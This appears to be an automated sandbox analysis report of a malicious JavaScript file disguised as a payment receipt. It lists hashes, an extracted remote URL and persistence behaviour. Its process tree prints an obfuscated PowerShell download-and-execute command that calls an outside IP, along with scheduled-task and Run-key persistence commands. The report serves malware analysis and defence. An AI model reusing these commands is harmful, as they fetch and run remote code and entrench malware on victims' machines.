Analysis
-
max time kernel
153s -
max time network
191s -
platform
windows7_x64 -
resource
win7-en-20210920 -
submitted
28-10-2021 15:41
Static task
static1
Behavioral task
behavioral1
Sample
h6d2_Payment_receipt.js
Resource
win7-en-20210920
General
-
Target
h6d2_Payment_receipt.js
-
Size
81KB
-
MD5
ac46bea5b7fd09b1ab3da2b95cb03006
-
SHA1
e59702bca30c23aed49b4e24e6f1411c450ba8d2
-
SHA256
2b3792055f5035ac6e37c372853654eb1d2ec05425f217b339816b0aa12605a2
-
SHA512
601600fd54e840843d04ea97f5e04389933cff2c49e0bca97207a27fe95937f282a8c3fc35f2e684aeb0f073f049dcd9f74ecf25fd56c9c35109d82d7ca433e4
Malware Config
Extracted
http://13.78.209.105/E/err.txt
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
wscript.exeflow pid process 5 1224 wscript.exe -
Drops startup file 2 IoCs
Processes:
wscript.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\h6d2_Payment_receipt.js wscript.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\h6d2_Payment_receipt.js wscript.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
wscript.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run wscript.exe Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run\BB4HJP0E1C = "'C:\\Users\\Admin\\AppData\\Local\\Temp\\h6d2_Payment_receipt.js'" wscript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1628 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1628 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
wscript.exeWScript.exedescription pid process target process PID 1224 wrote to memory of 1608 1224 wscript.exe schtasks.exe PID 1224 wrote to memory of 1608 1224 wscript.exe schtasks.exe PID 1224 wrote to memory of 1608 1224 wscript.exe schtasks.exe PID 1224 wrote to memory of 1112 1224 wscript.exe WScript.exe PID 1224 wrote to memory of 1112 1224 wscript.exe WScript.exe PID 1224 wrote to memory of 1112 1224 wscript.exe WScript.exe PID 1112 wrote to memory of 1628 1112 WScript.exe powershell.exe PID 1112 wrote to memory of 1628 1112 WScript.exe powershell.exe PID 1112 wrote to memory of 1628 1112 WScript.exe powershell.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\h6d2_Payment_receipt.js1⤵
- Blocklisted process makes network request
- Drops startup file
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\Admin\AppData\Local\Temp\h6d2_Payment_receipt.js2⤵
- Creates scheduled task(s)
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\OWZC107LZZ.vbs"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $H ='http://13.78.209.105/E/err.txt';$H1 = '******************^^^^^^^^^^^^^^^^^^``````````````'.Replace('******************','n').Replace('^^^^^^^^^^^^^^^^^^','E').Replace('``````````````','t');$H2 ='DDDDDDDDEEEEEEEEEEE'.Replace('DDDDDDDD','.').Replace('EEEEEEEEEE','W');$H4 ='NNNNNNNNNNNNNNNNTTTTTTTTTTNT'.Replace('NNNNNNNNNNNNNNNNTTTTTTTTTT','IE');$H3 ='LLLLLLLLLL'.Replace('LLLLLLLLL','bC');$HH =$H1+$H2+$H3+$H4;$HHH ='DO---------------nG'.Replace('---------------','WnLoaDSTrI');$HHHH ='I`---------------Ec++++++++++++++H).$HHH($H)'.Replace('`---------------','EX(ne`W`-Obj`').Replace('++++++++++++++','`T $H');&('I'+'EX')($HHHH -Join '')|&('I'+'EX');3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\OWZC107LZZ.vbsMD5
2b137d3d2ea7ddba63e99586f44e0388
SHA1d4634061943a78624880537ffa65472fc6195474
SHA2561af97b7b7febcf25481d8c653b141681be8a1cad29a563e9057c02c1c87b75c2
SHA5126a7240273576e625066b114960fa4063acd9404727d02bcd3183248f5c820161ec15fafe01858d22ddcf39cd4d03f8e52988625aabd7b01565339b8927693115
-
memory/1112-55-0x0000000000000000-mapping.dmp
-
memory/1224-53-0x000007FEFC2C1000-0x000007FEFC2C3000-memory.dmpFilesize
8KB
-
memory/1608-54-0x0000000000000000-mapping.dmp
-
memory/1628-58-0x0000000000000000-mapping.dmp
-
memory/1628-60-0x000007FEF3000000-0x000007FEF3B5D000-memory.dmpFilesize
11.4MB
-
memory/1628-62-0x0000000002702000-0x0000000002704000-memory.dmpFilesize
8KB
-
memory/1628-63-0x0000000002704000-0x0000000002707000-memory.dmpFilesize
12KB
-
memory/1628-61-0x0000000002700000-0x0000000002702000-memory.dmpFilesize
8KB
-
memory/1628-64-0x000000000270B000-0x000000000272A000-memory.dmpFilesize
124KB